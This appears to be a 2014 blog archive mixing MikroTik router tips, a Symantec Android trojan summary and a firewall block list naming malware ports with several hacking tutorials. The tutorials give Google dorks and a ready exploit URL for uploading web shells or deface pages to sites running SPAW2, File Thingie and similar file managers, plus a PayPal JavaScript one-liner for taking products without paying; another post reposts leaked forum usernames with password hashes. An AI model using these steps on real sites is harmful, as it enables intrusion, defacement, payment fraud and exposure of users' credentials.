Senin, 31 Maret 2014

Cara Mengatasi Lampu LED Mikrotik Kelap-Kelip

Saya punya Mikrotik RB751U-2HnD yang saya gunakan untuk hotspot di rumah. 3 bulan saya tinggal ke luar kota, ternyata Mikrotik nya rusak. Semua lampu LED nya kelap-kelip seperti lampu disco, kecuali LED wlan nya. Saya cari tahu, kenapa bisa begitu. Usut punya usut, ternyata Mikrotik ini sering dimatikan langsung tanpa shutdown yang benar. Saya kira Mikrotik nya sudah rusak, karena tidak bisa berjalan normal, dan tidak bisa diakses melalui winbox. 



Saya coba cari solusinya di internet, ternyata ada juga yang mengalami hal serupa. Mereka menyarankan untuk mengganti Power Supply original mikrotik 12 V DC dengan Power Supply lain yang punya tegangan lebih tinggi. Kemudian saya coba gunakan Power Supply lain dengan tegangan 15 V DC. Ternyata Mikrotik nya mau nyala, lampu LED nya tidak lagi kedap-kedip seperti lampu disco. Mikrotik bekerja dengan normal kembali. Saya juga bisa mengakses mikrotik nya via winbox dan setingan yang dulu pun tidak hilang.

Jadi, dari masalah Lampu LED Mikrotik Kelap-Kelip ini solusinya yaitu dengan mengganti power supply mikrotik. Saya sarankan untuk mengganti Power Supply nya dengan Power Supply original Mikrotik 24 V DC.

Untuk lebih jelasnya, liat video yang saya buat khusus untuk anda berikut ini :
 
Read more

Jumat, 28 Maret 2014

Android.Pjapps.B - New Android Trojan Reported By Symantec team

new-android-virus-reported-by-symantec

Earlier this month researcher from Symantec have found a new android rat named as "Dendroid". Today they reported another trojan  Android.Pjapps.B , new trojan specifically designed to target Android devices.

Android.Pjapps.B may arrive as a package with the following name com.mobile.app.writer.zhongguoyang

Once executed, the Trojan creates the following receivers:
  • com.android.main.SmsReceiver
  • com.android.main.ActionReceiver
When the Trojan is being installed  then it opens a back door on the compromised device and may perform the following actions: 
  • Send and monitor SMS messages
  • Read and write the user's browsing history and bookmarks
  • Install packages
  • Write to external storage
Symantec Security Response also gives some security measures to the users and administrators:-
  • Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.
  • Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.
  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.
  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.
  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.
  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack.
  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.
  • Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.
  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
  • Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.
  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.
  • For further information on the terms used in this document, please refer to the Security Response glossary.
How to remove?? 
To remove this risk manually, please perform the following actions: 
  1. Open the Google Android Menu.
  2. Go to the Settings icon and select Applications.
  3. Next, click Manage.
  4. Select the application and click the Uninstall button.
Source: Cyberkendra
Read more

Kamis, 27 Maret 2014

Spaw Shell Upload Vulnerablity

Spaw Shell Upload Vulnerablity:Hello Friends, today I'm going to share another Shell upload Vulnerablity with you all called Spaw Shell Upload Vulnerablity.. 2016

Follow the Instructions:-

1). Go to google and paste one of the following dorks as you like :)
  inurl:"spaw2/dialogs/"
  inurl:"spaw2/uploads/files/"
2). You will get lots of results. Open any site..
For Example i got :- example.com/spaw2/dialogs/
3). Now replace spaw2/dialogs/ with
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
  So now our url will look like this :-
example.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
4). Now open the site and it will look like this->



5). Now upload your deface page.. :)

Happy Hacking..ONly for educational Purposes..

Tags:

Read more

Selasa, 18 Maret 2014

Memblokir Port Virus di Mikrotik Menggunakan Firewall

Penyebaran virus dan malware di jaringan dapat terjadi jika kita tidak selektif dalam mengaktifkan port apa saja yang digunakan. Untuk mengamankan jaringan dari penyebaran virus dan malware, kita dapat menutup port komunikasi yang tidak digunakan dan rentan dimanfaatkan oleh virus. Caranya dengan menggunakan rule firewall Mikrotik untuk men-drop paket yang masuk ke port yang tidak digunakan.

Caranya sangat mudah, silakan anda copy paste command berikut ini ke terminal Mikrotik :


/ ip firewall filter
add chain=virus protocol=tcp dst-port=135-139 action=drop comment="Blaster Worm"
add chain=virus protocol=udp dst-port=135-139 action=drop comment="Messenger Worm"
add chain=virus protocol=tcp dst-port=445 action=drop comment="Blaster Worm"
add chain=virus protocol=udp dst-port=445 action=drop comment="Blaster Worm"
add chain=virus protocol=tcp dst-port=593 action=drop comment="________"
add chain=virus protocol=tcp dst-port=1024-1030 action=drop comment="________"
add chain=virus protocol=tcp dst-port=1080 action=drop comment="Drop MyDoom"
add chain=virus protocol=tcp dst-port=1214 action=drop comment="________"
add chain=virus protocol=tcp dst-port=1363 action=drop comment="ndm requester"
add chain=virus protocol=tcp dst-port=1364 action=drop comment="ndm server"
add chain=virus protocol=tcp dst-port=1368 action=drop comment="screen cast"
add chain=virus protocol=tcp dst-port=1373 action=drop comment="hromgrafx"
add chain=virus protocol=tcp dst-port=1377 action=drop comment="cichlid"

add chain=virus protocol=tcp dst-port=2745 action=drop comment="Bagle Virus"
add chain=virus protocol=tcp dst-port=2283 action=drop comment="Dumaru.Y"
add chain=virus protocol=tcp dst-port=2535 action=drop comment="Beagle"
add chain=virus protocol=tcp dst-port=2745 action=drop comment="Beagle.C-K"
add chain=virus protocol=tcp dst-port=3127-3128 action=drop comment="MyDoom"
add chain=virus protocol=tcp dst-port=3410 action=drop comment="Backdoor OptixPro"
add chain=virus protocol=tcp dst-port=4444 action=drop comment="Worm"
add chain=virus protocol=udp dst-port=4444 action=drop comment="Worm"
add chain=virus protocol=tcp dst-port=5554 action=drop comment="Drop Sasser"
add chain=virus protocol=tcp dst-port=8866 action=drop comment="Drop Beagle.B"
add chain=virus protocol=tcp dst-port=9898 action=drop comment="Drop Dabber.A-B"
add chain=virus protocol=tcp dst-port=10000 action=drop comment="Drop Dumaru.Y"
add chain=virus protocol=tcp dst-port=10080 action=drop comment="Drop MyDoom.B"
add chain=virus protocol=tcp dst-port=12345 action=drop comment="Drop NetBus"
add chain=virus protocol=tcp dst-port=17300 action=drop comment="Drop Kuang2"
add chain=virus protocol=tcp dst-port=27374 action=drop comment="Drop SubSeven"
add chain=virus protocol=tcp dst-port=65506 action=drop comment="Drop PhatBot,Agobot, Gaobot"
add chain=virus protocol=udp dst-port=12667 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=27665 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=31335 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=27444 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=34555 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=udp dst-port=35555 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=27444 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=27665 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=31335 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=31846 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=34555 action=drop comment="Trinoo" disabled=no
add chain=virus protocol=tcp dst-port=35555 action=drop comment="Trinoo" disabled=no
add action=drop chain=forward comment=";;Block W32.Kido - Conficker" disabled=no protocol=udp src-port=135-139,445
add action=drop chain=forward comment="" disabled=no dst-port=135-139,445 protocol=udp
add action=drop chain=forward comment="" disabled=no protocol=tcp src-port=135-139,445,593
add action=drop chain=forward comment="" disabled=no dst-port=135-139,445,593 protocol=tcp
add action=accept chain=input comment="Allow limited pings" disabled=no limit=50/5s,2 protocol=icmp
add action=accept chain=input comment="" disabled=no limit=50/5s,2 protocol=icmp
add action=drop chain=input comment="drop FTP Brute Forcers" disabled=no dst-port=21 protocol=tcp src-address-list=FTP_BlackList
add action=drop chain=input comment="" disabled=no dst-port=21 protocol=tcp src-address-list=FTP_BlackList
add action=accept chain=output comment="" content="530 Login incorrect" disabled=no dst-limit=1/1m,9,dst-address/1m protocol=tcp
add action=add-dst-to-address-list address-list=FTP_BlackList address-list-timeout=1d chain=output comment="" content="530 Login incorrect" disabled=no protocol=tcp
add action=drop chain=input comment="drop SSH&TELNET Brute Forcers" disabled=no dst-port=22-23 protocol=tcp src-address-list=IP_BlackList
add action=add-src-to-address-list address-list=IP_BlackList address-list-timeout=1d chain=input comment="" connection-state=new disabled=no dst-port=22-23 protocol=tcp src-address-list=SSH_BlackList_3
add action=add-src-to-address-list address-list=SSH_BlackList_3 address-list-timeout=1m chain=input comment="" connection-state=new disabled=no dst-port=22-23 protocol=tcp src-address-list=SSH_BlackList_2
add action=add-src-to-address-list address-list=SSH_BlackList_2 address-list-timeout=1m chain=input comment="" connection-state=new disabled=no dst-port=22-23 protocol=tcp src-address-list=SSH_BlackList_1
add action=add-src-to-address-list address-list=SSH_BlackList_1 address-list-timeout=1m chain=input comment="" connection-state=new disabled=no dst-port=22-23 protocol=tcp
add action=drop chain=input comment="drop port scanners" disabled=no src-address-list=port_scanners
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=fin,syn
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=syn,rst
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg
add action=add-src-to-address-list address-list=port_scanners address-list-timeout=2w chain=input comment="" disabled=no protocol=tcp tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg
Hasilnya akan jadi seperti ini :


Nah, sekarang kita sudah berhasil Memblokir Port Virus Menggunakan Firewall di Mikrotik.
Semoga bermanfaat :)
Read more

Minggu, 16 Maret 2014

Paypal Javascript Exploit - Get Products Free

In this Tutorial we are talking about Paypal Javascript  Exploit. So Here is a simple JavaScript exploit through which you can hack Paypal & download products for free without spending single penny . More then 500 sites are Vulnerable !! .



So lets start..! ;)

Follow The Instructions:-


1). Go to the vulnerable site & paste the below JavaScript given below in the browser & hit enter !!.


javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);




2). So after you have hit enter, just sit back & enjoy the free product .


3). So after you paste the JavaScript in the URL then the product will be automatically downloaded :)





More Vulnerable sites link -

 Click Here  (some sites are patched)
&

Enjoy...!!
Read more

Sabtu, 15 Maret 2014

Testing Image Shell and Deface Upload Vulnerability


In this tutorial we are talking about Testing Image Shell and Deface Upload Vulnerability. So lets start..

Follow the Instructions:


1). Search the following dorks.

Dorks:
inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
intitle:"Testing Image Collections"

2). Use both Google and Bing to search the above dork to find more vulnerable websites. 

3). Select any Website from the search result.Find the upload option. in the bottom left corner..





4). Now, Select your deface or Shell and Upload it.

To view your Uploaded shell or deface visit:
http://website.com/files/yourfilehere  

 http://websites.com/path/yourfilehere

Happy Hacking!! Only for Educational purposes..!!

Read more

Madleets Got Hacked and Data Leaked




Untitled2


The one of famous Pakistan hacking group Team Madleets hacked and their users leaked .The hacker  with the handle name “Dukhi Nawab” hacked and leaked the Madleets Admin and Moderator details before few minutes. Their team know as “PakBug” . PakBugs / Xploiter Crew hacked madleets 2nd time . Two months ago the owner of Xploiter Crew also Defaced the Madleets subdomains . The Hacker did not defaced the Website he just leaked the data.
Dukhi Nawab says:-
MadLeets HaCked And Data Leaked By DuKhi NawaB (PAKbugs jr)
Too long db, got bored to leak all.. ;) anyways remember that maddies we are ur daddies..
And neXt time secure your ass..
greetz ; ZombiE_KsA, stoKer, Xploiter & Dr.Freak

Leaked Database :-

1      1337                   1733bab470835253a22231dab3fe3dca

2      h4x0rl1Æ’3                ac39d4fe6fdb8ce21c72e4efaefd6e73

3      Tor Demon           8d685488c51f1497beb2863f7503b224

4      MindCracker              f4f7d36949cad89ff77379598069109b

More Database :- Click here
Read more

Jumat, 14 Maret 2014

File Thingie Shell Upload Exploit Vulnerablity


shell upload


This is a vulnerability which allows a remote attacker to upload his/her deface or shell on the website.

Follow the Steps=>

1). Go to google and search this dork. :)
Google Dork : inurl:ft2.php intext:upload

2). After the searching the above dork, you will get websites vulnerable to this. 

3). Select any website, upload your deface or shell there.

shell upload

4). To view your deface or shell, just click on your file name after its uploaded.

shell upload

Happy Hacking .ONly for Educational Purposes ..!!!!!

File Thingie Shell Upload Exploit Vulnerablity
File Thingie Shell Upload
File Thingie Exploit
Read more